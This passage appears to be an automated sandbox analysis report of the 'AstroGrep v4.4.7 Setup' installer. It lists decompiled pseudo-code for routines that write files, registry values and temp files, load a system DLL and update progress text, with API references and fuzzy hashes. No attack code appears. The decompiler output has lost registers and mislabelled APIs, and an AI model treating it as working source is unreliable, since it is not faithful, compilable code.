				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004030B1(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004030B1(0x414420, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405A49(_a8, 0x414420, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ad84 =  *0x40ad84 & 0x00000000;
					 *0x40ad80 =  *0x40ad80 & 0x00000000;
                                                                                                            					_t14 =  &_a16;
                                                                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                                                                            					_v20 = _t70;
                                                                                                            					 *0x40a868 = 8;
                                                                                                            					 *0x414410 = 0x40c408;
                                                                                                            					 *0x41440c = 0x40c408;
                                                                                                            					 *0x414408 = 0x414408;
                                                                                                            					_a4 = _a16;
                                                                                                            					if( *_t14 <= 0) {
                                                                                                            						goto L44;
                                                                                                            					} else {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					while(1) {
                                                                                                            						L9:
                                                                                                            						_t99 = 0x4000;
                                                                                                            						if(_a16 < 0x4000) {
                                                                                                            							_t99 = _a16;
                                                                                                            						}
                                                                                                            						if(E004030B1(0x414420, _t99) == 0) {
                                                                                                            							goto L41;
                                                                                                            						}
                                                                                                            						_a16 = _a16 - _t99;
                                                                                                            						 *0x40a858 = 0x414420;
                                                                                                            						 *0x40a85c = _t99;
                                                                                                            						while(1) {
                                                                                                            							_t95 = _v16;
                                                                                                            							 *0x40a860 = _t95;
                                                                                                            							 *0x40a864 = _v12;
                                                                                                            							_t75 = E004061AB(0x40a858);
                                                                                                            							_v24 = _t75;
                                                                                                            							if(_t75 < 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t100 =  *0x40a860; // 0x75d8b4
                                                                                                            							_t101 = _t100 - _t95;
                                                                                                            							_t76 = GetTickCount();
                                                                                                            							_t96 = _t76;
                                                                                                            							if(( *0x42e4b4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                                            								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                            								_t102 = _t102 + 0xc;
                                                                                                            								E00404F48(0,  &_v88); // executed
                                                                                                            								_v20 = _t96;
                                                                                                            							}
                                                                                                            							if(_t101 == 0) {
                                                                                                            								if(_a16 > 0) {
                                                                                                            									goto L9;
                                                                                                            								}
                                                                                                            								goto L44;
                                                                                                            							} else {
                                                                                                            								if(_a12 != 0) {
                                                                                                            									_t77 =  *0x40a860; // 0x75d8b4
                                                                                                            									_v8 = _v8 + _t101;
                                                                                                            									_v12 = _v12 - _t101;
                                                                                                            									_v16 = _t77;
                                                                                                            									L23:
                                                                                                            									if(_v24 != 1) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									goto L44;
                                                                                                            								}
                                                                                                            								_t78 = E00405A49(_a8, _v16, _t101); // executed
                                                                                                            								if(_t78 == 0) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								_v8 = _v8 + _t101;
                                                                                                            								goto L23;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_push(0xfffffffc);
                                                                                                            						goto L42;
                                                                                                            					}
                                                                                                            					goto L41;
                                                                                                            				}
                                                                                                            			}

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$wsprintf
                                                                                                            • String ID: DA$ DA$... %d%%
                                                                                                            • API String ID: 551687249-812340929
                                                                                                            • Opcode ID: 3db6f8c6f652b1c77dd2c917078849ed77b49c7e940390d82110b7debcd341ac
                                                                                                            • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                            • Opcode Fuzzy Hash: 3db6f8c6f652b1c77dd2c917078849ed77b49c7e940390d82110b7debcd341ac
                                                                                                            • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                                                                            Uniqueness
                                                                                                            • Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040605A(intOrPtr _a4) {
				char _v292;                 // path buffer; 0x104 == MAX_PATH
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;                 // frame pointer: _t21 - 0x120 is &_v292
				char* _t5;                  // separator string (missing from the decompiler output)

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {          // buffer too small: treat the directory as empty
					_t10 = 0;
				}
				// _t16 == 1 when the directory is empty or already ends in '\' (0x5c)
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409014; // 0x5c: "\" at 0x409014, or the empty string one byte past it
				// Appends "<sep><name>.dll" after the directory, e.g. "<sysdir>\UXTHEME.dll"
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed; 8 == LOAD_WITH_ALTERED_SEARCH_PATH
				return _t14;
			}

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00406071
• wsprintfA.USER32 ref: 004060AA
• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%s.dll$UXTHEME$\
• API String ID: 2200240437-4240819195
• Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
• Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
• Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
• Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E004026C6(int __ebx) {
				void* _t26;
				long _t31;
				intOrPtr _t39;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;                 // frame pointer
				long _t47;                  // chunk length (missing from the decompiler output)
				char* _t50;                 // target path (missing from the decompiler output)

				_t45 = __ebx;               // zero in every use below
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66; // initial status, -666
				_t50 = E00402A3A(0xfffffff0); // resolve the target path string
				 *(_t56 - 0x38) = _t50;     // kept for DeleteFileA below
				if(E0040580E(_t50) == 0) {
					E00402A3A(0xffffffed);
				}
				E0040597D(_t50);
				_t26 = E004059A2(_t50, 0x40000000, 2); // open for writing; 0x40000000 matches GENERIC_WRITE
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {    // INVALID_HANDLE_VALUE check
					_t31 =  *0x42e414;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31); // 0x40 == GPTR (fixed, zero-initialised)
					if(_t49 != _t45) {
						E004030C7(_t45);
						E004030B1(_t49,  *(_t56 - 0x30)); // fill the first buffer
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							E00402E9F( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20)); // executed
							// Walk a list of (length, offset, data...) records and patch them into _t49
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x50) =  *_t54;
								E0040595D( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x50);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405A49( *(_t56 + 8), _t49,  *(_t56 - 0x30)); // executed; write the buffer to the file
						GlobalFree(_t49); // executed
						_t39 = E00402E9F(0xffffffff,  *(_t56 + 8), _t45, _t45); // executed
						 *((intOrPtr*)(_t56 - 0xc)) = _t39;
					}
					// executed; closes the file handle (the report resolves CloseHandle to this KERNELBASE export)
					FindCloseChangeNotification( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) { // negative status: remove the partial file
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t56 - 4)); // global error counter
				return 0;
			}

APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
• GlobalFree.KERNEL32 ref: 0040276F
• GlobalFree.KERNEL32 ref: 00402782
• FindCloseChangeNotification.KERNELBASE(?,?,?,?,000000F0), ref: 0040279A
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: Global$AllocFree$ChangeCloseDeleteFileFindNotification
• String ID:
• API String ID: 2989416154-0
• Opcode ID: fc843bc57811b3c266407200668139bacaf742fdca07d4dd84a32fe73dd5847c
• Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
• Opcode Fuzzy Hash: fc843bc57811b3c266407200668139bacaf742fdca07d4dd84a32fe73dd5847c
• Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
			// Formats a 64-bit byte count (_a12 low dword, _a16 high dword) as "<int>.<tenth><unit>"
			// and writes it into dialog item _a4.
			E00404709(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				signed int _t23;            // missing from the decompiler output
				void* _t29;
				void* _t31;
				void* _t32;
				int _t35;
				void* _t41;                 // language string ID of the unit suffix (negative IDs)
				signed int _t43;
				signed int _t47;            // tenths digit
				signed int _t50;
				signed int _t51;
				signed int _t53;            // integer part

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;          // default unit
				if(_t21 == 0) {             // high dword is zero: the value fits in 32 bits
					// The push/pop pairs load the shift amount into a register the decompiler
					// lost; the ">> 0" shifts below are really ">> <that amount>".
					_push(0x14);            // shift by 20 (0x100000 == 1 MiB)
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);         // shift by 10 (0x400 == 1 KiB)
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) { // rounding term; guarded so the addition cannot overflow
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					// (m + 4m) * 2 == 10 * m: the tenths digit is (10 * m >> shift) % 10
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14; // 64-bit value in MiB
					_t47 = 0;
				}
				_t29 = E00405D51(_t41, _t47, _t53,  &_v36, 0xffffffdf); // language strings by negative ID
				_t31 = E00405D51(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D51(_t41, _t47, 0x429868, 0x429868, _a8);
				wsprintfA(_t32 + lstrlenA(0x429868), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				_t35 = SetDlgItemTextA( *0x42dbd8, _a4, 0x429868); // executed
				return _t35;
			}

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(AstroGrep v4.4.7 Setup ,AstroGrep v4.4.7 Setup ,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                            • wsprintfA.USER32 ref: 004047AF
                                                                                                            • SetDlgItemTextA.USER32 ref: 004047C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$AstroGrep v4.4.7 Setup
                                                                                                            • API String ID: 3540041739-3341080892
                                                                                                            • Opcode ID: 935ee2909ce3d91a1e0ef8c8852d81f66e795bf13d31c63d3c36d76b3f3a4298
                                                                                                            • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                            • Opcode Fuzzy Hash: 935ee2909ce3d91a1e0ef8c8852d81f66e795bf13d31c63d3c36d76b3f3a4298
                                                                                                            • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00402364(void* __eax) {
                                                                                                            				void* _t15;
                                                                                                            				char* _t18;
                                                                                                            				int _t19;
                                                                                                            				long _t22;
                                                                                                            				char _t24;
                                                                                                            				int _t27;
                                                                                                            				intOrPtr _t35;
                                                                                                            				void* _t37;
                                                                                                            
                                                                                                            				_t15 = E00402B2F(__eax);
                                                                                                            				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                                                                            				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                                                                            				 *(_t37 - 0x38) = E00402A3A(2);
                                                                                                            				_t18 = E00402A3A(0x11);
                                                                                                            				 *(_t37 - 4) = 1;
                                                                                                            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42e4b0 | 0x00000002, _t27, _t37 + 8, _t27); // executed
                                                                                                            				if(_t19 == 0) {
                                                                                                            					if(_t35 == 1) {
                                                                                                            						E00402A3A(0x23);
                                                                                                            						_t19 = lstrlenA(0x409c10) + 1;
                                                                                                            					}
                                                                                                            					if(_t35 == 4) {
                                                                                                            						_t24 = E00402A1D(3);
                                                                                                            						 *0x409c10 = _t24;
                                                                                                            						_t19 = _t35;
                                                                                                            					}
                                                                                                            					if(_t35 == 3) {
                                                                                                            						_t19 = E00402E9F( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x409c10, 0xc00);
                                                                                                            					}
                                                                                                            					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x409c10, _t19); // executed
                                                                                                            					if(_t22 == 0) {
                                                                                                            						 *(_t37 - 4) = _t27;
                                                                                                            					}
                                                                                                            					_push( *(_t37 + 8));
                                                                                                            					RegCloseKey(); // executed
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *(_t37 - 4);
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq211B.tmp
                                                                                                            • API String ID: 1356686001-8733237
                                                                                                            • Opcode ID: 0b7ce92ed5109c362c2d34632f72a8d91888c561e4c423054677ea15aa728ce6
                                                                                                            • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                            • Opcode Fuzzy Hash: 0b7ce92ed5109c362c2d34632f72a8d91888c561e4c423054677ea15aa728ce6
                                                                                                            • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004059D1(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                            				char _t11;
                                                                                                            				signed int _t12;
                                                                                                            				int _t15;
                                                                                                            				signed int _t17;
                                                                                                            				void* _t20;
                                                                                                            				CHAR* _t21;
                                                                                                            
                                                                                                            				_t21 = _a4;
                                                                                                            				_t20 = 0x64;
                                                                                                            				while(1) {
                                                                                                            					_t11 =  *0x4093ac; // 0x61736e
                                                                                                            					_t20 = _t20 - 1;
                                                                                                            					_a4 = _t11;
                                                                                                            					_t12 = GetTickCount();
                                                                                                            					_t17 = 0x1a;
                                                                                                            					_a6 = _a6 + _t12 % _t17;
                                                                                                            					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                            					if(_t15 != 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(_t20 != 0) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					 *_t21 =  *_t21 & 0x00000000;
                                                                                                            					return _t15;
                                                                                                            				}
                                                                                                            				return _t21;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                            Strings
                                                                                                            • nsa, xrefs: 004059DC
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                            • "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" , xrefs: 004059D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-23235572
                                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                            • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                            • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 51%
                                                                                                            			E00401BCA() {
                                                                                                            				signed int _t28;
                                                                                                            				CHAR* _t31;
                                                                                                            				long _t32;
                                                                                                            				int _t37;
                                                                                                            				signed int _t38;
                                                                                                            				int _t42;
                                                                                                            				int _t48;
                                                                                                            				struct HWND__* _t52;
                                                                                                            				void* _t55;
                                                                                                            
                                                                                                            				 *(_t55 - 8) = E00402A1D(3);
                                                                                                            				 *(_t55 + 8) = E00402A1D(4);
                                                                                                            				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                                                                            					 *((intOrPtr*)(__ebp - 8)) = E00402A3A(0x33);
                                                                                                            				}
                                                                                                            				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                                                                            				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                                                                            					 *(_t55 + 8) = E00402A3A(0x44);
                                                                                                            				}
                                                                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                                                                            				_push(1);
                                                                                                            				if(__eflags != 0) {
                                                                                                            					_t50 = E00402A3A();
                                                                                                            					_t28 = E00402A3A();
                                                                                                            					asm("sbb ecx, ecx");
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t31 =  ~( *_t27) & _t50;
                                                                                                            					__eflags = _t31;
                                                                                                            					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
                                                                                                            					goto L10;
                                                                                                            				} else {
                                                                                                            					_t52 = E00402A1D();
                                                                                                            					_t37 = E00402A1D();
                                                                                                            					_t48 =  *(_t55 - 0x14) >> 2;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8)); // executed
                                                                                                            						L10:
                                                                                                            						 *(_t55 - 0xc) = _t32;
                                                                                                            					} else {
                                                                                                            						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                                                                            						asm("sbb eax, eax");
                                                                                                            						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                                                                            				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                                                                            					_push( *(_t55 - 0xc));
                                                                                                            					E00405C8D();
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t55 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            Instruction addresses (one per decompiled line above, in order):
                                                                                                            0x00401bd3 0x00401bdf 0x00401be2 0x00401beb 0x00401beb 0x00401bee 0x00401bf2 0x00401bfb 0x00401bfb 0x00401bfe
                                                                                                            0x00401c02 0x00401c04 0x00401c51 0x00401c53 0x00401c5c 0x00401c64 0x00401c67 0x00401c67 0x00401c70 0x00000000
                                                                                                            0x00401c06 0x00401c0d 0x00401c0f 0x00401c17 0x00401c1a 0x00401c42 0x00401c76 0x00401c76 0x00401c1c 0x00401c2a
                                                                                                            0x00401c32 0x00401c35 0x00401c35 0x00401c1a 0x00401c79 0x00401c7c 0x00401c82 0x00402877 0x00402877 0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                            • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                                            • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                            • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E0040588F(void* __eflags, intOrPtr _a4) {
                                                                                                            				int _t11;
                                                                                                            				signed char* _t12;
                                                                                                            				long _t16;
                                                                                                            				intOrPtr _t18;
                                                                                                            				intOrPtr* _t21;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				E00405D2F(0x42ac70, _a4);
                                                                                                            				_t21 = E0040583A(0x42ac70);
                                                                                                            				if(_t21 != 0) {
                                                                                                            					E00405F9A(_t21);
                                                                                                            					if(( *0x42e418 & 0x00000080) == 0) {
                                                                                                            						L5:
                                                                                                            						_t22 = _t21 - 0x42ac70;
                                                                                                            						while(1) {
                                                                                                            							_t11 = lstrlenA(0x42ac70);
                                                                                                            							_push(0x42ac70);
                                                                                                            							if(_t11 <= _t22) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t12 = E00406033();
                                                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                            								E004057E8(0x42ac70);
                                                                                                            								continue;
                                                                                                            							} else {
                                                                                                            								goto L1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E004057A1();
                                                                                                            						_t16 = GetFileAttributesA(??); // executed
                                                                                                            						return 0 | _t16 != 0xffffffff;
                                                                                                            					}
                                                                                                            					_t18 =  *_t21;
                                                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            Instruction addresses (one per decompiled line above, in order):
